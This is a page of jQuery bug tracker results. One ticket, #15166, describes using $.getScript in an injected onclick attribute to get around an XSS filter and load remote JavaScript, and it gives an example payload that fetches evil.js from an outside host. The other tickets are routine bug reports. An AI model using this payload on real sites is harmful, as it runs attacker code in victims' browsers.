Bug Tracker

Custom Query (13852 matches)


Results (67 - 69 of 13852)

Ticket Resolution Summary Owner Reporter
#15168 notabug IE 8 not supported by jQuery 2.0.3 jdsharp Prakash Sankar

Currently I am using jQuery 2.0.3 in my project. When I roll back to the 1.x series via the NuGet package manager console, I am getting the same error...

#15166 notabug $.getScript Function may cause XSS attack lupin

$.getScript can load a JavaScript file from a remote server, then execute it.

In some cases, if an attacker can control this function or its parameter, this function may cause an XSS attack.

For example, if an attacker can control an HTML tag (such as an input tag).

<input type=text onclick=...>

An attacker can control the onclick event, but the web app filters evil characters (<script>, document...). In this case XSS cannot occur, but if the web page contains the jQuery library, the attacker can bypass the filter mechanism using the $.getScript function, like this.

<input type=text onclick=$.getScript('http://jquery.com/evil.js')>

The attacker puts evil.js on his remote server; this JavaScript file contains evil JavaScript code. When a user clicks the input tag, the evil JavaScript code will execute.

I think the jQuery library should add a white list: a web page can only load a JavaScript file from the current domain by default; if a web page needs to load a JavaScript file from a remote server, the developer has to add the domain to the white list.

#15165 notabug jQuery .offset().top wrong on refresh of page Knecker

When getting .offset().top from a relatively positioned element, e.g. a div, in combination with .scroll, .offset reports a wrong value once at a refresh. (Occurring in Firefox 31.)

Construction Example:

var test = $("#something").offset().top;



Related stackoverflow thread: http://stackoverflow.com/questions/11649454/jquery-offset-wrong-on-refresh-of-page
